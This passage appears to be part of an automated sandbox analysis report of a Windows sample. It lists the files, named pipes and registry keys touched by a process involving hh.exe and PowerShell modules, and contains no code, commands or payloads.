                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Utility

                    
                        C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility

                    
                        C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\4a8acbb9132ca60f78667419f032025a\Microsoft.PowerShell.Commands.Utility.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\4a8acbb9132ca60f78667419f032025a\Microsoft.PowerShell.Commands.Utility.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\29c26981c4b4347ca371002934f6f2ac\System.Configuration.Install.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\29c26981c4b4347ca371002934f6f2ac\System.Configuration.Install.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.PowerShell.Commands.Utility.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC\Microsoft.PowerShell.Commands.Utility.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Commands.Utility.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\assembly\GAC\Microsoft.PowerShell.Commands.Utility.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Utility.resources\Microsoft.PowerShell.Commands.Utility.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Utility.resources.exe

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Utility.resources\Microsoft.PowerShell.Commands.Utility.resources.exe

                    
                        C:\Python38\Scripts\test-connection.*

                    
                        C:\Python38\test-connection.*

                    
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath\test-connection.*

                    
                        C:\ProgramData\Boxstarter\test-connection.*

                    
                        C:\Windows\System32\test-connection.*

                    
                        C:\Windows\test-connection.*

                    
                        C:\Windows\System32\wbem\test-connection.*

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\test-connection.*

                    
                        C:\ProgramData\chocolatey\bin\test-connection.*

                    
                        C:\Program Files\dotnet\test-connection.*

                    
                        C:\Program Files (x86)\dotnet\test-connection.*

                    
                        C:\Program Files\OpenJDK\jdk-19.0.1\bin\test-connection.*

                    
                        C:\Program Files\PowerShell\7-preview\preview\test-connection.*

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\*

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Management

                    
                        C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management

                    
                        C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\90320822eb308768046478524b13b02d\Microsoft.PowerShell.Commands.Management.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\90320822eb308768046478524b13b02d\Microsoft.PowerShell.Commands.Management.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Services\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.Services.dll

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\boxstarter.chocolatey.psm1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.WinConfig\boxstarter.WinConfig.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.HyperV\boxstarter.HyperV.psm1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Common\boxstarter.common.psm1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\boxstarter.bootstrapper.psm1

                    
                        C:\Windows\Temp

                    
                        \??\PIPE\samr

                    
                        C:\Windows\System32\wbem\repository

                    
                        C:\Windows\System32\wbem\Logs

                    
                        C:\Windows\System32\wbem\AutoRecover

                    
                        C:\Windows\System32\wbem\MOF

                    
                        C:\Windows\System32\wbem\repository\INDEX.BTR

                    
                        C:\Windows\System32\wbem\repository\WRITABLE.TST

                    
                        C:\Windows\System32\wbem\repository\MAPPING1.MAP

                    
                        C:\Windows\System32\wbem\repository\MAPPING2.MAP

                    
                        C:\Windows\System32\wbem\repository\MAPPING3.MAP

                    
                        C:\Windows\System32\wbem\repository\OBJECTS.DATA

                    
                        \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER

                    
                        \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM

                    
                        C:\Windows\System32\rpcss.dll

                    
                        \Device\Afd\Endpoint

                    
                        \??\Nsi

                    
                        \Device\RasAcd

                    
                        C:

                    
                
            

        

        

            

                
            

        

        

            

                
                    
                        C:\Users\user\AppData\Roaming\Microsoft\HTML Help\hh.dat

                    
                        C:\Users\user\AppData\Local\Temp\IMT5AE9.tmp

                    
                        C:\Users\user\AppData\Local\Temp\~DFE4C0C9E922237CB3.TMP

                    
                        C:\Users\user\AppData\Local\Temp\~DF206D010F207A645D.TMP

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

                    
                        C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

                    
                        \??\PIPE\srvsvc

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0R21C5093AY4OZ5LY7OX.temp

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF22641b9.TMP

                    
                        C:\Users\user\AppData\Local\Temp\uyhh2amx.eph.ps1

                    
                        C:\Users\user\AppData\Local\Temp\bzfyfzsr.33n.psm1

                    
                        C:\PSTranscripts\20251209\PowerShell_transcript.USERDUM-8A61A1P.o3rz6VZb.20251209170730.txt

                    
                        \??\PIPE\samr

                    
                        C:\Windows\System32\wbem\repository\WRITABLE.TST

                    
                        C:\Windows\System32\wbem\repository\MAPPING1.MAP

                    
                        C:\Windows\System32\wbem\repository\MAPPING2.MAP

                    
                        C:\Windows\System32\wbem\repository\MAPPING3.MAP

                    
                        C:\Windows\System32\wbem\repository\OBJECTS.DATA

                    
                        C:\Windows\System32\wbem\repository\INDEX.BTR

                    
                        \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER

                    
                        \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM

                    
                        \Device\Afd\Endpoint

                    
                        \Device\RasAcd

                    
                
            

        

        

            

                
                
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF22641b9.TMP

                
                C:\Users\user\AppData\Local\Temp\uyhh2amx.eph.ps1

                
                C:\Users\user\AppData\Local\Temp\bzfyfzsr.33n.psm1

                
                
            

        

        

            

                
                
                DisableUserModeCallbackFilter

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableHHDEP

                
                HKEY_CLASSES_ROOT\CLSID\{52A2AAAE-085D-4187-97EA-8C30DB990436}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52A2AAAE-085D-4187-97EA-8C30DB990436}\InprocServer32\(Default)

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\D6C3CCFA

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SharedDir

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\1.x\HHRestrictions\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

                
                HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author

                
                HKEY_CURRENT_USER\Software\Classes

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\AutoConvertTo

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\hh.exe

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI

                
                HKEY_CURRENT_USER\Software\Classes\TypeLib

                
                HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\hh.exe

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\mk\OpenWithProgids

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\mk

                
                HKEY_CLASSES_ROOT\mk

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mk\CurVer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mk\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mk\ShellFolder

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}

                
